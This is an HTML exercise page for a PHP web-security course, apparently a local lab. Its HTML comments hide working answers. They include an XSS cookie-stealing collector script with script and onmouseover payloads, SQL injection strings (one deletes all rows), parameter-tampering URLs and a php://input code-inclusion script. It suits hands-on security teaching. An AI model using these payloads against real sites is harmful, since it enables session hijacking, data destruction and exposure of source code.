<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Web Security with PHP - exercises</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
P { margin-bottom: 5em; }
</style>
</head>

<body>

<h1>Web Security with PHP - exercises</h1>
<ul>
<li><a href="security.ppt">Slides</a></li>
<li><em>Do not copy these files to a public server, it can damage poorly secured sites.</em></li>
</ul>

<h2>1. Cross Site Scripting</h2>

<p><strong>1.1</strong> Create a script in PHP or other language which will collect stolen sessions. It can save data to the database or send them by e-mail. If you are not able to create the script, use <code>1-xss/exploit/add.php</code> accepting <code>login</code> and <code>cookie</code> parameters and <a href="1-xss/exploit/">1-xss/exploit/</a> displaying stolen sessions.</p>
<!--
add.php:
<?php mysql_query("INSERT INTO security.cookies (login, cookie, added) VALUES ('$_GET[login]', '$_GET[cookie]', NOW())"); ?>
index.php:
<?php
setcookie(session_name(), "", 0, "/");
$result = mysql_query("SELECT * FROM security.cookies");
while ($row = mysql_fetch_assoc($result)) {
	echo "<a href='../?$row[cookie]'>" . ($row["login"] ? $row["login"] : $row["cookie"]) . "</a> ($row[added])<br />\n";
}
mysql_free_result($result);
?>
-->

<p><strong>1.2</strong> <a href="1-xss/">Write message</a> with <code>&lt;script&gt;</code> tag stealing user sessions. You can use <code>document.write('&lt;script src="..."&gt;')</code> and <code>document.cookie</code> holding all cookies valid for current page.</p>
<!-- <script>document.write('<script src="exploit/add.php?login=' + document.getElementById('login').innerHTML + '&amp;cookie=' + document.cookie + '"><' + '/script>');</script> -->

<p><strong>1.3</strong> Script <a href="1-xss/strip_tags.php">strip_tags.php</a> allows only <code>&lt;strong&gt;</code> and <code>&lt;em&gt;</code> tags. Use the <code>onmouseover</code> or other attribute to steal the session. You can use <code>document.createElement('script')</code> and <code>document.getElementById('login').appendChild()</code> or AJAX. Use <code>style</code> attribute to spread the element to the whole window.</p>
<!-- <strong style="position: absolute; left: 0; top: 0; width: 100%; height: 100%;" onmouseover="s = document.createElement('script'); s.src = 'exploit/add.php?login=' + document.getElementById('login').innerHTML + '&amp;cookie=' + document.cookie; document.getElementById('login').appendChild(s); this.style.height = 0;"></strong> -->

<h2>2. SQL Injection</h2>

<p><strong>2.1</strong> <a href="2-sql/">Change passwords</a> of all users. Hint: login is not properly escaped.</p>
<!-- Login: ' OR 1 # -->

<p><strong>2.2</strong> Delete all authors in <a href="2-sql/sqlite.php">SQLite</a>.</p>
<!-- '; DELETE FROM authors; (dash)(dash)(space) -->

<p><strong>2.3</strong> Cause SQL syntax error with <a href="2-sql/escape.php">wrong escaping</a> <code>mysql_real_escape_string($_GET["offset"])</code>.</p>
<!-- ?offset=a -->

<h2>3. Variables</h2>

<p><strong>3.1</strong> Gain access to the <a href="3-variables/">secret information</a>. This is the code used in the script: <code>if ($_POST["password"] == "...") $auth = true;</code>.</p>
<!-- ?auth=1 -->

<p><strong>3.2</strong> <a href="3-variables/e_notice.php">e_notice.php</a> script has its credentials stored in <code>$auth["password"]</code>. Even if it has <code>E_NOTICE</code> error level enabled, it can be still easily fooled if you guess just the first letter of <strong>p</strong>assword.</p>
<!-- ?auth=1&password=p -->

<h2>4. Include</h2>

<p><strong>4.1</strong> Create a text file with PHP script printing the source of <code>index.php</code> and put it somewhere on the web. If you don't have a capability to perform this step you can use <a href="4-include/exploit/highlight_file.txt">4-include/exploit/highlight_file.txt</a>.</p>
<!-- <?php highlight_file("index.php"); ?> -->

<p><strong>4.2</strong> Print the source of <a href="4-include/">index.php</a> (execute the created file in the context of original page).</p>
<!-- ?page=exploit%2Fhighlight_file.txt -->

<p><strong>4.3</strong> You can see that variable <code>$auth</code> is correctly initialized in <code>index.php</code>. However, it is still possible to display secret information on <a href="4-include/secure.php">secure page</a> running it without context of <code>index.php</code> and injecting variable.</p>
<!-- secure.php?auth=1 -->

<p><strong>4.4</strong> Imagine that <a href="http://www.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen"><kbd>allow_url_fopen</kbd></a> directive is disabled. You can still gain control over the site by passing <a href="http://www.php.net/manual/en/wrappers.php.php"><code>php://input</code></a> and posting PHP code. Create a script performing this operation.</p>
<!--
<?php
$context = stream_context_create(array('http' => array('method' => 'POST', 'content' => '<?php highlight_file("index.php"); ?>')));
readfile("http://localhost/security/4-include/?page=" . urlencode("php://input"), false, $context);
?>
-->

</body>
</html>
